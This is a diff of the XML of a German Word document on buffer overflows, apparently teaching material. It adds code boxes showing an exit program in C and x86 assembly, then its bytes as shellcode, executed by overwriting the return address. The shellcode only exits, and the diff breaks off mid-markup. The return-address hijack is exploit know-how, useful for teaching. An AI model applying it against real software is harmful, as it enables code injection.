--- a/buffer_overflow.docx
+++ b/buffer_overflow.docx
@@ -466,7 +466,7 @@
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:223.9pt;height:287.2pt" o:ole="">
             <v:imagedata r:id="rId8" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411796399" r:id="rId9"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411797913" r:id="rId9"/>
         </w:object>
       </w:r>
     </w:p>
@@ -491,7 +491,7 @@
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
             <v:imagedata r:id="rId10" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411796400" r:id="rId11"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411797914" r:id="rId11"/>
         </w:object>
       </w:r>
     </w:p>
@@ -748,13 +748,3270 @@
         </w:rPr>
         <w:t>&gt;</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42D81E75" wp14:editId="78153ADA">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225425</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>112395</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1488440" cy="1366520"/>
+                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
+                <wp:wrapNone/>
+                <wp:docPr id="2" name="Textfeld 2"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1488440" cy="1366520"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdlib.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>()</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>exit</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(0);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Textfeld 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.85pt;width:117.2pt;height:107.6pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdlib.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>()</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>exit</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(0);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B4E5AE2" wp14:editId="58013EEE">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2054420</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>112506</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1488880" cy="1367043"/>
+                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
+                <wp:wrapNone/>
+                <wp:docPr id="3" name="Textfeld 3"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1488880" cy="1367043"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>text</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>globl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> _</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>start</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    _</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>start</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> :</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $20, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ebx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $1, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Kopfzeile"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $0x80</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:161.75pt;margin-top:8.85pt;width:117.25pt;height:107.65pt;z-index:251662336;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>text</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>globl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> _</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>start</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    _</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>start</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> :</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $20, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ebx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $1, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Kopfzeile"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $0x80</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExitShellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ausführen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>103617</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="3889180" cy="2510043"/>
+                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
+                <wp:wrapNone/>
+                <wp:docPr id="4" name="Textfeld 4"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="3889180" cy="2510043"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[] = "\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xbb</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\x14\x00\x00\x00"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                   "\xb8\x01\x00\x00\x00"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                   "\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xcd</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\x80";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(){</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> *</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> = (</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> *)&amp;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> +2;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    (*</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>) = (</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">;    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
